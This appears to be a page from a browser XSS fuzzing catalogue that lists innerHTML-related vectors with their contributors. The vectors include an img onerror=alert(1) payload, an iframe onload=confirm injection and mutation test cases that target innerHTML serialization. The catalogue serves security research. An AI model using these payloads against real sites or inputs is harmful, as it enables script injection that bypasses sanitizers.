Featured vector

IE 11.0
<!-- sample vector --> <img src="xx:xx0x22onerror=alert(1)>

Fuzz vector cloud

3,344,426 Successful fuzzes

Fuzz Vectors

Searching for "innerHTML"

Your browser identified as

General Crawlers unknown

All vectors

Description Vector Created by
incorrect innerHTML serialization <*datahtmlelements*>&lt;</*datahtmlelements*> <*datahtmlelements*/>&lt;</*datahtmlelements*> @garethheyes
Execute XSS through previousSibling replace in DOM using innerHTML and escaping right angle bracket <body> §iframe onload=confirm(/xss/)&gt; <img src=x:x onerror="innerHTML=previousSibling.nodeValue.replace('§','<')"> </body> *urlenc* @secalert
Single character breaking innerHTML copy <div id="fuzzelement*num*"> <div title="*chr*style=color:#FF1133;" id="copyTarget*num*">*num* - test</div> </div> @thewildcat
Entity character breaking innerHTML copy <div id="fuzzelement*num*"> <div title="&#x*hex6*;style=color:#FF1133" id="copyTarget*num*">*num* - test</div> </div> @thewildcat
Characters breaking innerHTML copy <div id="fuzzelement*num*"> <div title="*chr**chr*style=color:#FF1133" id="copyTarget*num*">*num* - test</div> </div> @thewildcat